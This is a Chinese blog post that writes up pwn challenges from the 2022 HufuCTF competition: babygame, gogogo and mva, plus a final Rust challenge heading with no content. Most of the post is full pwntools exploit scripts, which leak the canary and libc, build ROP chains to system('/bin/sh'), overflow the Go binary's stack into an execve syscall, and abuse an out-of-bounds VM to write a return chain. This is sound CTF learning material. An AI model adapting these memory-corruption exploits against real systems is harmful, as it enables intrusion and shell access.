---
title: 2022 虎符CTF pwn 复现
date: 2022-04-11 22:54:59 +0800
categories:
  - ctf比赛
tags:
  - pwn
  - ctf
permalink: /posts/id=9/
pin: false
published:
---
这次比赛最后是高校组47名，加油吧

## babygame（随机数绕过+格式化字符串）
题目大意是剪刀石头布进行猜拳，设置了种子，但种子在栈上，且可溢出覆盖
所以就改掉种子，然后再for循环和它比，从而实现绕过进入漏洞函数

格式化字符串漏洞，只有一次，泄露libc同时跳到有栈溢出的那个read里
一开始因为没有泄露地址犹豫了很久，后来发现前边覆盖种子的时候似乎能进行泄露。。

```python
from pwn import*
from ctypes import *
# p = process('./babygame')
#p = remote('120.25.205.249','20346')
elf = ELF("./babygame")
context.arch = "amd64"
# libc = elf.libc
libc = elf.libc
libc1 = cdll.LoadLibrary('./libc-2.31.so')
# context.log_level='debug'
gad=[0xe3b2e,0xe3b31,0xe3b34]
'''
0xe3b2e execve("/bin/sh", r15, r12)
constraints:
  [r15] == NULL || r15 == NULL
  [r12] == NULL || r12 == NULL

0xe3b31 execve("/bin/sh", r15, rdx)
constraints:
  [r15] == NULL || r15 == NULL
  [rdx] == NULL || rdx == NULL

0xe3b34 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL
  [rdx] == NULL || rdx == NULL
'''
s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(data)
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)
def pwn():
	p.recvuntil("Please input your name:")

	p.send(0x100*'b'+8*'b'+'a')

	p.recvuntil('a')
	canary = u64('\x00'+p.recv(7))
	stack = u64(p.recv(6)+'\x00'*2)
	lg('canary',canary)
	lg('stack',stack)

	libc1.srand(0x62626262626262)

	for i in range(1,101):
		j = str((libc1.rand()+1)%3)
		p.recvuntil('round '+str(i)+': ')
		p.send(j)

	game = 0x153E
	ret = stack-(0x7ffea348d4c0-0x7ffea348d2a8)
	pay = "%{}c%{}$hnk%9$p".format(1218,8)
	pay += p64(ret)
	p.recvuntil('Good luck to you.')
	p.send(pay)
	p.recvuntil('k')
	libc_base = int(p.recv(14),16)-175-libc.sym['printf']
	lg('libc_base',libc_base)
	one = gad[1] + libc_base
	system = libc_base+libc.sym['system']
	bin_sh = libc_base+next(libc.search('/bin/sh\x00'))
	pop_rdi = libc_base + 0x23b72
	ret = 0x0000000000022679+libc_base
	'''
	0x0000000000023b72: pop rdi; ret; 
	0x0000000000022679: ret;

	'''
	pay = 0x100*'b'+p64(canary)*5+p64(ret)+p64(pop_rdi)+p64(bin_sh)+p64(system)
	p.send(pay)

times = 0
while 1:
    try:
        p = process("./babygame")
        pwn()
        p.interactive()
    except:
        times += 1
        print("="*8+str(times)+" times"+"="*8)
        p.close()
```
### tips
这里也可以通过栈上的函数地址泄露pie偏移，就不用爆破了



> 后边是复现

## gogogo(go语言+栈溢出)
赛后看这题其实也不难，比赛的时候怎么就做不出呢
![image.png](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/26177342-555b2173263a36dd.png)

go语言程序，函数入口在math_init，字符串的输出都是单个字母，所以程序流不太好判断。

先要过第一个判断

![image.png](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/26177342-21a603044533ff2f.png)

如果进入elseif程序就结束了
我go不太好，大概应该是和开线程有关系，重新执行game

![image.png](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/26177342-33ad6950edcd66a2.png)

然后就如题所说是个游戏

![image.png](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/26177342-b4273927464cfa92.png)

然后就是网上找脚本绕过，这里改了一下验证函数（这部很关键，但其实这题爆破结果也能解，就是时间久一点）
[python初学---猜数字游戏（游戏与AI，原创） - funolove - 博客园 (cnblogs.com)](https://www.cnblogs.com/funlove/p/13215041.html)
然后就根据程序流找字符串，然后定位函数位置
这里是are you sure?，然后有个read

![image.png](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/26177342-f6555e33eeb5e337.png)

makeslice函数[(19条消息) GO语言slice详解（结合源码）_胖子依然6的博客-CSDN博客_go语言slice源码](https://blog.csdn.net/sinat_34560749/article/details/104444072)这里有解释
Read_read读入0x800，栈溢出0x460，调用syscall即可
![image.png](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/26177342-f0bb0c8e6353c144.png)
![image.png](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/26177342-024145bd45b1520e.png)

```python
# coding=utf-8
from pwn import *
context.log_level = 'debug'

s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(data)
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)

p=process("./gogogo")

def guessTrainner():
   start =time.time()
   answerSet=answerSetInit(set())
   for i in range(6):
      inputStrMax=suggestedNum(answerSet,100)
      print('第%d步----' %(i+1))
      print('尝试：' +inputStrMax)
      print('----')
      AMax,BMax = compareAnswer(inputStrMax)
      print('反馈：%dA%dB' % (AMax, BMax))
      print('----')
      print('排除可能答案：%d个' % (answerSetDelNum(answerSet,inputStrMax,AMax,BMax)))
      answerSetUpd(answerSet,inputStrMax,AMax,BMax)
      if AMax==4:
         elapsed = (time.time() - start)
         print("猜数字成功，总用时：%f秒，总步数：%d。" %(elapsed,i+1))
         break
      elif i==5:
         print("猜数字失败！")
 
 
def compareAnswer(inputStr):
	inputStr1 = inputStr[0]+' '+inputStr[1]+' '+inputStr[2]+' '+inputStr[3]
	p.sendline(inputStr1)
	ru('\n')
	tmp = p.recvuntil('B',timeout=0.5)
	# print(tmp)
	if tmp == '':
		return 4,4
	tmp = tmp.split("A")
	A = tmp[0]
	B = tmp[1].split('B')[0]
	return int(A),int(B)
 
def compareAnswer1(inputStr,answerStr):
   A=0
   B=0
   for j in range(4):
      if inputStr[j]==answerStr[j]:
         A+=1
      else:
         for k in range(4):
            if inputStr[j]==answerStr[k]:
               B+=1
   return A,B
   
def answerSetInit(answerSet):
   answerSet.clear()
   for i in range(1234,9877):
      seti=set(str(i))
      if len(seti)==4 and seti.isdisjoint(set('0')):
         answerSet.add(str(i))
   return answerSet
 
def answerSetUpd(answerSet,inputStr,A,B):
   answerSetCopy=answerSet.copy()
   for answerStr in answerSetCopy:
      A1,B1=compareAnswer1(inputStr,answerStr)
      if A!=A1 or B!=B1:
         answerSet.remove(answerStr)
 
def answerSetDelNum(answerSet,inputStr,A,B):
   i=0
   for answerStr in answerSet:
      A1, B1 = compareAnswer1(inputStr, answerStr)
      if A!=A1 or B!=B1:
         i+=1
   return i
 
 
def suggestedNum(answerSet,lvl):
   suggestedNum=''
   delCountMax=0
   if len(answerSet) > lvl:
      suggestedNum = list(answerSet)[0]
   else:
      for inputStr in answerSet:
         delCount = 0
         for answerStr in answerSet:
            A,B = compareAnswer1(inputStr, answerStr)
            delCount += answerSetDelNum(answerSet, inputStr,A,B)
         if delCount > delCountMax:
            delCountMax = delCount
            suggestedNum = inputStr
         if delCount == delCountMax:
            if suggestedNum == '' or int(suggestedNum) > int(inputStr):
               suggestedNum = inputStr
 
   return suggestedNum
 
 
ru("PLEASE INPUT A NUMBER:")
p.sendline("1717986918")
ru("PLEASE INPUT A NUMBER:")
p.sendline("1234")
ru("YOU HAVE SEVEN CHANCES TO GUESS")
guessTrainner()
sa("AGAIN OR EXIT?","exit")
sla("(4) EXIT","4")
syscall = 0x47CF05
binsh = 0xc00007c000

payload = '/bin/sh\x00'*0x8c + p64(syscall) + p64(0) + p64(59) + p64(binsh) + p64(0) + p64(0)
 
sla("ARE YOU SURE?",payload)
p.interactive()
```

## mva(数组越界VMpwn)

具体细节在[VMpwn总结](https://blog.e4l4.com/posts/VMpwn总结/)，这里放个exp

```python
from pwn import *
context.log_level = "debug"

p = process('./mva')

def pack(code, dst, op2, op1):
  return p32(((op1&0xff)<<24)+((op2&0xff)<<16)+((dst&0xff)<<8)+code)
                
   
# 泄露程序基地址
#  0x11f*2=0x23e stack+0x23e
code =  pack(1,0,1,0x1f)   # reg[0] = 0x11f(op2:op1)
code += pack(0xe, 0, -10, 0)  # reg[-10]<=>(idx) = reg[0]
# high
code += pack(0xa, 5, 0, 0)    # reg[5] = stack[--idx_]
code += pack(0xf, 0, 0, 0) # printf stack[idx]
# mid
code += pack(0xa, 4, 0, 0)    # reg[4] = stack[--idx_]
code += pack(0xf, 0, 0, 0) # printf stack[idx]
# low
code += pack(0xa, 3, 0, 0)    # reg[3] = stack[--idx_]
code += pack(0xf, 0, 0, 0) # printf stack[idx]
# -0x10 -> idx=0x10f
code += pack(0xa, 2, 0, 0)*13    # reg[2] = stack[--idx_] * 13

#泄露libc基地址
# high
code += pack(0xa, 2, 0, 0) # reg[2] = stack[--idx_]
code += pack(0xf, 0, 0, 0) # printf stack[idx]
# mid
code += pack(0xa, 2, 0, 0) # reg[2] = stack[--idx_]
code += pack(0xf, 0, 0, 0) # printf stack[idx]
# low
code += pack(0xa, 2, 0, 0) # reg[2] = stack[--idx_]
code += pack(0xf, 0, 0, 0) # printf stack[idx]

# 然后下面是ret to 0x12AE, 再次执行
# 之前泄露的程序地址加0x4即0x2AE
code += pack(1,0,0,0x4)   # reg[0] = (op2:op1)
code += pack(2, 3, 3, 0)      # reg[3] = reg[3] + reg[0]

# 设置好idx=0x800000000000010c，让stack指向ret
code += pack(1,0,0x1,0xc)   # reg[0] = 0x10c(op2:op1)
code += pack(0xe, 0, -10, 0)  # reg[-10]<=>(idx) = reg[0]
code += pack(1,0,0x80,0)   # reg[0] = 0x10f(op2:op1)
code += pack(0xe, 0, -7, 0)  # reg[-7]<=>(idx[3]) = reg[0]
# low
code += pack(0xe, 3, 0, 0)  # reg[0] = reg[3]
code += pack(9, 0, 0, 0)      # stack[idx] = reg[0]
# mid
code += pack(1,0,0x1,0xc+1)   # reg[0] = 0x10c+1(op2:op1)
code += pack(0xe, 0, -10, 0)  # reg[-10]<=>(idx) = reg[0]
code += pack(0xe, 4, 0, 0)  # reg[0] = reg[4]
code += pack(9, 0, 0, 0)      # stack[idx] = reg[0]
# high
code += pack(1,0,0x1,0xc+2)   # reg[0] = 0x10c+2(op2:op1)
code += pack(0xe, 0, -10, 0)  # reg[-10]<=>(idx) = reg[0]
code += pack(0xe, 5, 0, 0)  # reg[0] = reg[5]
code += pack(9, 0, 0, 0)      # stack[idx] = reg[0]

code = code.ljust(0x100, b"\x00")
p.sendlineafter(b"[+] Welcome to MVA, input your code now :\n", code)
p.recvuntil(b"[+] MVA is starting ...\n")

elf_base = (int(p.recvline(), 10) << 32) + (int(p.recvline(), 10) << 16) + int(p.recvline(), 10) - 0x12aa
libc_base = (int(p.recvline(), 10) << 32) + (int(p.recvline(), 10) << 16) + int(p.recvline(), 10) - 0x240b3
success(hex(elf_base))
success(hex(libc_base))
pop_rdi_ret = libc_base + 0x0000000000023b72
bin_sh = libc_base + 0x1b45bd
system_addr = libc_base + 0x522c0

# 设置好idx，让stack指向ret
code2 =  b"a"*175
code2 += pack(1,0,0x1,0xc)   # reg[0] = 0x10c(op2:op1)
code2 += pack(0xe, 0, -10, 0)  # reg[-10]<=>(idx) = reg[0]
code2 += pack(1,0,0x80,0)   # reg[0] = 0x10f(op2:op1)
code2 += pack(0xe, 0, -7, 0)  # reg[-7]<=>(idx[3]) = reg[0]

# 顺序写入pop_rdi+binsh+system
for i in range(4):
  d1, d2 = pop_rdi_ret&0xff, (pop_rdi_ret>>8)&0xff
  code2 += pack(9, 1, d2, d1)   # stack[idx] = op2:op1
  pop_rdi_ret = pop_rdi_ret >> 16

for i in range(4):
  d1, d2 = bin_sh&0xff, (bin_sh>>8)&0xff
  code2 += pack(9, 1, d2, d1)   # stack[idx] = op2:op1
  bin_sh = bin_sh >> 16

for i in range(4):
  d1, d2 = system_addr&0xff, (system_addr>>8)&0xff
  code2 += pack(9, 1, d2, d1)   # stack[idx] = op2:op1
  system_addr = system_addr >> 16

code2 = code2.ljust(0x100, "\x00")
p.sendafter(b"[+] Welcome to MVA, input your code now :\n", code2)

p.interactive()
```

## vdq(Rust)

